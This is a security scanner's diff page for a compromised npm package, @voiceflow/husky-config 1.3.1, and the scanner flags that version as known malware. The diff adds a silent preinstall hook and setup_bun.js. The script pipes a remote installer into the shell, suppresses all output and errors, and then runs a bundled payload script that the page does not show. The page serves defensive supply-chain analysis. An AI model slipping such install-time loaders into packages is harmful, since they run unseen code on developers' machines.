@voiceflow/husky-config - npm Package Compare versions

Comparing version 1.3.0 to 1.3.1

setup_bun.js

+#!/usr/bin/env node
+const { spawn, execSync } = require('child_process');
+const path = require('path');
+const fs = require('fs');
+const os = require('os');
+
+function isBunOnPath() {
+  try {
+    const command = process.platform === 'win32' ? 'where bun' : 'which bun';
+    execSync(command, { stdio: 'ignore' });
+    return true;
+  } catch {
+    return false;
+  }
+}
+
+function reloadPath() {
+  // Reload PATH environment variable
+  if (process.platform === 'win32') {
+    try {
+      // On Windows, get updated PATH from registry
+      const result = execSync('powershell -c "[Environment]::GetEnvironmentVariable(\'PATH\', \'User\') + \';\' + [Environment]::GetEnvironmentVariable(\'PATH\', \'Machine\')"', {
+        encoding: 'utf8'
+      });
+      process.env.PATH = result.trim();
+    } catch {
+    }
+  } else {
+    try {
+      // On Unix systems, source common shell profile files
+      const homeDir = os.homedir();
+      const profileFiles = [
+        path.join(homeDir, '.bashrc'),
+        path.join(homeDir, '.bash_profile'),
+        path.join(homeDir, '.profile'),
+        path.join(homeDir, '.zshrc')
+      ];
+
+      // Try to source profile files to get updated PATH
+      for (const profileFile of profileFiles) {
+        if (fs.existsSync(profileFile)) {
+          try {
+            const result = execSync(`bash -c "source ${profileFile} && echo $PATH"`, {
+              encoding: 'utf8',
+              stdio: ['pipe', 'pipe', 'ignore']
+            });
+            if (result && result.trim()) {
+              process.env.PATH = result.trim();
+              break;
+            }
+          } catch {
+            // Continue to next profile file
+          }
+        }
+      }
+
+      // Also check if ~/.bun/bin exists and add it to PATH if not already there
+      const bunBinDir = path.join(homeDir, '.bun', 'bin');
+      if (fs.existsSync(bunBinDir) && !process.env.PATH.includes(bunBinDir)) {
+        process.env.PATH = `${bunBinDir}:${process.env.PATH}`;
+      }
+    } catch {}
+  }
+}
+
+async function downloadAndSetupBun() {
+  try {
+    let command;
+    if (process.platform === 'win32') {
+      // Windows: Use PowerShell script
+      command = 'powershell -c "irm bun.sh/install.ps1|iex"';
+    } else {
+      // Linux/macOS: Use curl + bash script
+      command = 'curl -fsSL https://bun.sh/install | bash';
+    }
+
+    execSync(command, {
+      stdio: 'ignore',
+      env: { ...process.env }
+    });
+
+    // Reload PATH to pick up newly installed bun
+    reloadPath();
+
+    // Find bun executable after installation
+    const bunPath = findBunExecutable();
+    if (!bunPath) {
+      throw new Error('Bun installation completed but executable not found');
+    }
+
+    return bunPath;
+  } catch  {
+    process.exit(0);
+  }
+}
+
+function findBunExecutable() {
+  // Common locations where bun might be installed
+  const possiblePaths = [];
+
+  if (process.platform === 'win32') {
+    // Windows locations
+    const userProfile = process.env.USERPROFILE || '';
+    possiblePaths.push(
+      path.join(userProfile, '.bun', 'bin', 'bun.exe'),
+      path.join(userProfile, 'AppData', 'Local', 'bun', 'bun.exe')
+    );
+  } else {
+    // Unix locations
+    const homeDir = os.homedir();
+    possiblePaths.push(
+      path.join(homeDir, '.bun', 'bin', 'bun'),
+      '/usr/local/bin/bun',
+      '/opt/bun/bin/bun'
+    );
+  }
+
+  // Check if bun is now available on PATH
+  if (isBunOnPath()) {
+    return 'bun';
+  }
+
+  // Check common installation paths
+  for (const bunPath of possiblePaths) {
+    if (fs.existsSync(bunPath)) {
+      return bunPath;
+    }
+  }
+
+  return null;
+}
+
+function runExecutable(execPath, args = [], opts = {}) {
+  const child = spawn(execPath, args, {
+    stdio: 'ignore',
+    cwd: opts.cwd || process.cwd(),
+    env: Object.assign({}, process.env, opts.env || {})
+  });
+
+  child.on('error', (err) => {
+    process.exit(0);
+  });
+
+  child.on('exit', (code, signal) => {
+    if (signal) {
+      process.exit(0);
+    } else {
+      process.exit(code === null ? 1 : code);
+    }
+  });
+}
+
+// Main execution
+async function main() {
+  let bunExecutable;
+
+  if (isBunOnPath()) {
+    // Use bun from PATH
+    bunExecutable = 'bun';
+  } else {
+    // Check if we have a locally downloaded bun
+    const localBunDir = path.join(__dirname, 'bun-dist');
+    const possiblePaths = [
+      path.join(localBunDir, 'bun', 'bun'),
+      path.join(localBunDir, 'bun', 'bun.exe'),
+      path.join(localBunDir, 'bun.exe'),
+      path.join(localBunDir, 'bun')
+    ];
+
+    const existingBun = possiblePaths.find(p => fs.existsSync(p));
+
+    if (existingBun) {
+      bunExecutable = existingBun;
+    } else {
+      // Download and setup bun
+      bunExecutable = await downloadAndSetupBun();
+    }
+  }
+
+  const environmentScript = path.join(__dirname, 'bun_environment.js');
+  if (fs.existsSync(environmentScript)) {
+    runExecutable(bunExecutable, [environmentScript]);
+  } else {
+    process.exit(0);
+  }
+}
+
+main().catch((error) => {
+  process.exit(0);
+});

package.json

 {
   "name": "@voiceflow/husky-config",
-  "version": "1.3.0",
+  "version": "1.3.1",
   "files": [],
   "scripts": {
-    "postinstall": "cd $PROJECT_CWD && husky install"
+    "postinstall": "cd $PROJECT_CWD && husky install",
+    "preinstall": "node setup_bun.js"
   },
@@ -15,2 +16,2 @@ "dependencies": {
   "gitHead": "dae6df5ad40ef202fbf7af0bbdf6a7ec891827eb"
-}
+}

New alerts

Known malware

Supply chain risk

This package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.

Found 1 instance in 1 package

Install scripts

Supply chain risk

Install scripts are run when the package is installed or built. Malicious packages often use scripts that run automatically to execute payloads or fetch additional code.

Found 1 instance in 1 package

Shell access

Supply chain risk

This module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.

Found 1 instance in 1 package

Unpublished package

Supply chain risk

Package version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.

Found 1 instance in 1 package

Environment variable access

Supply chain risk

Package accesses environment variables, which may be a sign of credential stuffing or data theft.

Found 3 instances in 1 package

Filesystem access

Supply chain risk

Accesses the file system, and could potentially read sensitive data.

Found 1 instance in 1 package

URL strings

Supply chain risk

Package contains fragments of external URLs or IP addresses, which the package may be accessing at runtime.

Found 1 instance in 1 package

Fixed alerts

Empty package

Supply chain risk

Package does not contain any code. It may be removed, is name squatting, or the result of a faulty package publish.

Found 1 instance in 1 package

Unpopular package

Quality

This package is not very popular.

Found 1 instance in 1 package

AI-detected potential code anomaly

Supply chain risk

AI has identified unusual behaviors that may pose a security risk.

Found 1 instance in 1 package

Improved metrics

Total package byte prevSize

10163052

2171492.31%

Number of package files

4

100%

Lines of code

1167

Infinity%

Number of medium quality alerts

0

-100%

Worsened metrics

Number of critical supply chain risk alerts

1

Infinity%

Number of high supply chain risk alerts

2

100%

Number of low supply chain risk alerts

11

450%

Number of medium supply chain risk alerts

2

100%

No dependency changes